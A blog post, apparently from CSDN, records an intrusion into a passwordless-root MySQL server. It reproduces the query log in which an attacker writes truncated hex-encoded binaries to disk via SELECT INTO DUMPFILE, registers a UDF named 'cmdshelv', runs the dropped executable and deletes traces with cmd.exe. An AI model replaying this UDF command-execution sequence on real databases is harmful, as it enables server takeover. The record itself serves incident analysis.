mysql设置问题导致的攻击记录

最新推荐文章于 2023-11-17 21:38:40 发布
最新推荐文章于 2023-11-17 21:38:40 发布
阅读量124 收藏
点赞数
分类专栏: linux database 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010993111/article/details/83972063
版权
主要是当时安装mysql的时候没有设置root密码,实际上已经设置了root用户只能localhost登录,但是不知道这个入侵者是如何远程root登录的~~~
入侵者的ip:220.189.225.30 是个美国的ip
分析:

先创建一个临时表, create table if not exists tempMix4(data LONGBLOB);

然后插入一堆代码,估计是文件的16进制编码,

110624 12:50:28 49679 Query set @a = concat('',0x4D5A90000300000004000000FFFF0000B80000000000000040...此处省去很多很多...0000000000000000000000)
110624 12:50:38 49679 Query INSERT INTO tempMix4 VALUES (@a)

然后执行了以下的语句,从而在windows下会在

   49679 Query select data from tempMix into DUMPFILE 'C:\\WINDOWS\\amd.dll'
49679 Query select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
49679 Query select data from tempMix into DUMPFILE 'C:\\WINDOWS\\SYSTEM32\\amd.dll'
49679 Query select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
49679 Query select data from tempMix into DUMPFILE '..\\lib\\plugin\\amd.dll'
49679 Query select data from tempMix into DUMPFILE 'C:\\amd.dll'
49679 Query select data from tempMix into DUMPFILE '..\\bin\\amd.dll'

这些文件夹生成了一个amd.dll文件,

然后执行以下操作:估计是执行这些文件,文件具体干嘛的不知道~~

   110624 12:50:44 49679 Query create function cmdshelv returns string soname 'amd.dll'
49679 Query create function cmdshelv returns string soname 'amd.dll'
49679 Query create function cmdshelv returns string soname 'C:\\WINDOWS\\system32\\amd.dll'
110624 12:50:45 49679 Query create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll'
49679 Query create function cmdshelv returns string soname 'C:\\WINDOWS\\SYSTEM32\\amd.dll'
49679 Query create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll'
49679 Query create function cmdshelv returns string soname 'amd.dll'
110624 12:50:46 49679 Query select cmdshelv('c:\\33061.exe')
49679 Query select cmdshelv('c:\\33061.exe')
110624 12:50:47 49679 Query select cmdshelv('cmd.exe cmd/c del c:\33061.exe')
110624 12:50:48 49679 Query select cmdshelv('cmd.exe cmd/c del c:\33061.exe')
110624 12:50:49 49679 Query select cmdshelv('cmd.exe cmd/c del c:\33061.exe')
49679 Query select cmdshelv('cmd.exe cmd/c del c:\amd.dll')
49679 Query select cmdshelv('cmd.exe cmd/c del C:\WINNT\amd.dll')
49679 Query select cmdshelv('cmd.exe cmd/c del C:\WINDOWS\amd.dll')

--------------------------------------------------------------------------------详细入侵过程如下-------------------------------------------------

110624 12:50:19 49679 Connect root@220.189.225.30 on
49679 Query drop function cmdshell
110624 12:50:20 49679 Query drop function my_udfdoor
49679 Query drop function do_system
49679 Query use mysql
110624 12:50:21 49679 Query drop table if exists tempMix4
49679 Query create table if not exists tempMix4(data LONGBLOB)
110624 12:50:28 49679 Query set @a = concat('',0x4D5A90000300000004000000FFFF0000B80000000000000040...此处省去很多很多...0000000000000000000000)
110624 12:50:38 49679 Query INSERT INTO tempMix4 VALUES (@a)
49679 Query select data from tempMix4 into DUMPFILE 'C:\\33061.exe'
110624 12:50:39 49679 Query drop table if exists tempMix4
49679 Query use mysql
49679 Query drop table if exists tempMix
110624 12:50:40 49679 Query create table if not exists tempMix(data LONGBLOB)
110624 12:50:42 49679 Query set @a = concat('',0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000...此处省去很多很多...00000000000000000)
110624 12:50:43 49679 Query INSERT INTO tempMix VALUES (@a)
49679 Query select data from tempMix into DUMPFILE 'C:\\WINDOWS\\amd.dll'
49679 Query select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
49679 Query select data from tempMix into DUMPFILE 'C:\\WINDOWS\\SYSTEM32\\amd.dll'
49679 Query select data from tempMix into DUMPFILE 'C:\\WINT\\amd.dll'
49679 Query select data from tempMix into DUMPFILE '..\\lib\\plugin\\amd.dll'
49679 Query select data from tempMix into DUMPFILE 'C:\\amd.dll'
49679 Query select data from tempMix into DUMPFILE '..\\bin\\amd.dll'
110624 12:50:44 49679 Query create function cmdshelv returns string soname 'amd.dll'
49679 Query create function cmdshelv returns string soname 'amd.dll'
49679 Query create function cmdshelv returns string soname 'C:\\WINDOWS\\system32\\amd.dll'
110624 12:50:45 49679 Query create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll'
49679 Query create function cmdshelv returns string soname 'C:\\WINDOWS\\SYSTEM32\\amd.dll'
49679 Query create function cmdshelv returns string soname 'C:\\WINNT\\amd.dll'
49679 Query create function cmdshelv returns string soname 'amd.dll'
110624 12:50:46 49679 Query select cmdshelv('c:\\33061.exe')
49679 Query select cmdshelv('c:\\33061.exe')
110624 12:50:47 49679 Query select cmdshelv('cmd.exe cmd/c del c:\33061.exe')
110624 12:50:48 49679 Query select cmdshelv('cmd.exe cmd/c del c:\33061.exe')
110624 12:50:49 49679 Query select cmdshelv('cmd.exe cmd/c del c:\33061.exe')
49679 Query select cmdshelv('cmd.exe cmd/c del c:\amd.dll')
49679 Query select cmdshelv('cmd.exe cmd/c del C:\WINNT\amd.dll')
49679 Query select cmdshelv('cmd.exe cmd/c del C:\WINDOWS\amd.dll')
49679 Query drop table if exists tempMix
49679 Quit
u010993111
关注
专栏目录
〖Python 数据库开发实战 - Python与MySQL交互篇②〗- SQL 注入攻击案例
易编橙 · 终身成长社群,相遇已是上上签!
08-22 4万+
上一章节,我们只是简单的了解了 MySQL Connector 的语法,完成了一个简单的案例。Python 语言操作数据库不是到这里就结束了后续还有很多高级的内容等着我们去学习,该章节我们就来学习一下对所有数据库都有效的 "SQL 注入攻击" 。
【漏洞挖掘】——130、 MySql约束攻击刨析
最新发布
Fly_鹏程万里
07-03 505
或者一开始就养成良好的数据库设计风格,不用user来作为外键,而用id作为外键,这样我们的数据库才能更安全。该漏洞是由于MySQL对于字符串验证不严格而导致的。注册一个用户——"admin "
[原]Mysql日志分析
夏日小草
09-13 546
0x01.AboutMySQL有四种类型的日志:Error Log、General Query Log、Binary Log 和 Slow Query Log。第一种错误日志,记录MySQL运行过程ERROR,WARNING,NOTE等信息,系统出错或者某条记录问题可以查看ERROR日志...
cs生成hta文件源码解析
weixin_53665691的博客
11-17 660
一.cs 生成hta文件源码二.源码解析三.解决方法。
同事发来的文件是个html,逮到一个疑是感染html,htm,网页文件的木马
weixin_29666489的博客
06-16 476
事情是这样子的远程帮同事搞进销存软件 ,发现软件打开不正常了如图"在此页上的ActiveX控件和本页上的其它部分的交互可能不安全“我选择继续,是如下图“当前页面脚本发生错误。%1不是有效的win32应用程序。”这里我要说一下的,IE浏览器我都是设置过的,正常情况下进入这个页面是不会有这两个提示的我觉得哪里有猫腻,我按提示路径找到那个html文件,发现如下在html文件尾部被添加了如下代码[Visu...
内网渗透(二)之提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-14 5804
对于内网渗透,到我们拿到了公网主机的权限后,并获得了一些本机的信息时。我们首先得知道我们的权限。如果获取到的是普通用户权限,则我们需要想办法提权至管理员权限。如果获得的已经是管理员权限,则可以忽略这一步。对于Windows系统,只有提权到管理员权限后,才可以运行mimikatz以及执行一些其他高权限的操作。对于Linux系统,很多命令需要root权限才能执行,只有提权到root权限才能执行后面的信息收集等工作。
记录mysql数据库攻击
lzh7917的博客
07-20 4563
记录mysql数据库攻击事件处理过程异常情况异常1异常2如何避免参考资料 事件 由于本人比较懒,几个月以前在云服务器上部署了mysql,建了一个demo就没管了。今天突然发现数据库连不上了…貌似我没改过密码… WTF… 跳过权限验证后发现,发现数据库表不见了,只有一个readme表,打开一看豁然开朗…原来被攻击了。表里描述如下: 以下数据库已被删除:demo。 我们有完整的备份。 要恢复它,您必须向我们的比特币地址bc1qqh56c8wayvmkrszgqduzx50dyq5ypqy8fguw38支付0
mysql服务攻击检测_【渗透测试要点】MySQL攻击面和提权总结
weixin_34980267的博客
01-27 601
原标题:【渗透测试要点】MySQL攻击面和提权总结本次实验使用腾讯云主机的MySQL Server作为服务端,阿里云主机作为MySQL客户端。其中均使用宝塔面板搭建MySQL8.0版本。首先要开放腾讯云主机的端口,并且允许MySQL Server允许任意用户远程登录。1攻击面——MySQL客户端任意文件读取适用范围:全版本 MySQL/MariaDB Client条件:客户端连接时开启 –enab...
MySQL安全问题探讨.pdf
10-10
2. **避免以root权限运行MySQL**:安装完成后,数据库目录归属应设置为“mysql”用户,而软件目录归属为“root”。这样可以防止具有FILE权限的用户以root身份创建文件,降低安全风险。 3. **防止DNS欺骗**:创建...
mysql数据库根据引擎备份_修改mysql存储引擎备份数据库报错及解决方案
weixin_42536058的博客
01-18 132
备份数据库报错原因:由于监控服务器最近cpu负载比较高。(cpu4核心,负载2.7左右)感觉很奇怪,因为别的服务器mysql占用的资源并不多,因此我首先优化了数据库的配置文件。cpu稍微下降了一点,但是没有特别明显的变化。于是,从mysql的存储引擎和日志考虑,结果发现默认用的引擎是myisam。好吧。换成innodb,(由于事先我没备份,就在配置文件修改了引擎,因为日志除了二进制其他并没有开启。...
mysql的udf提权复现
Shanfenglan's blog
03-09 2114
文章目录参考文章 参考文章 udf提权原理详解
mysql udf 一次渗透测试
whatday的专栏
10-29 375
最近,我对某金融机构做渗透时发现他们拥有自己的内网,并且后端使用的是MySQL 5.7 64-bit。根据以往的经验,我的合作伙伴大多都使用的是MSSQL,因此在我看来这是一个非常罕见的场景。我在web应用中发现了SQL注入漏洞,使我可以从mysql.user dump用户名和密码,并且我还发现我的当前权限允许我将文件写入到磁盘。这也是促使我写这篇文章的原因,希望向大家分享关于在Windows下U...
Mysql攻击
weixin_30920513的博客
05-08 600
日志: show global variables like '%general%'; set global general_log=on; 默认Path:/var/run/mysqld/mysqld.log general_log是外部csv文件,若想提高查询性能:alter table general_log engine=myisam; 被修改参数:max_allowed_packet=20...
关于amd.dll后门病毒入侵3306端口的临时解决方案
纪敏强的博客
09-01 323
amd.dll入侵事宜: 由于MySQL 5.1.30以上版本的一个漏洞(当然是不是因为漏洞的原因,目前暂未知),导致一个后门程序会通过3306端口的MySQL服务获取到Windows的管理权限,并在系统中产生amd.dll基本后门程序,并不断释放boot1.exe/boot2.exe/12345.exe/net.exe/net1.exe....等等垃圾程序,并在系统分区根目录,Window...
python 读取sql server 日志_网安备忘录|Mssql数据库命令执行总结
weixin_39911916的博客
12-11 584
原标题:网安备忘录|Mssql数据库命令执行总结0x00 简介本文的攻击场景如下: 演示环境的利用场景: 本文将要介绍以下内容:xp_cmdshell利用COM组件利用CLR利用SQL Server 2016 R利用SQL Server 2017 Python利用沙盒利用(openrowset)Agent Job利用0x01 xp_cmdshell利用前提条件:Mssql数据库服务未降权已获取到数...
SQLServer数据库注入详解
热门推荐
谢公子的博客
06-28 2万+
目录 SQLServer数据库 修改默认1433端口 SQLServer数据库的管理 SQLServer数据库的查询语句 SA权限开启xp_cmdshell获取主机权限 SA权限使用sp_oacreate执行系统命令 DB_owner权限LOG备份Getshell DB_owner权限差异备份Getshell 盲注SQLServer数据库 SQLServer数据库 SQL S...
mysql默认设置的风险剖析:授权表漏洞与安全隐患
- 如果默认安装路径下的mysql目录权限设置不当,可能会导致未经授权的访问,威胁数据库数据的安全。 为了提高MySQL的安全性,应修改默认设置,例如: - 限制root用户的连接权限,仅允许特定IP地址或主机。 - 启用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值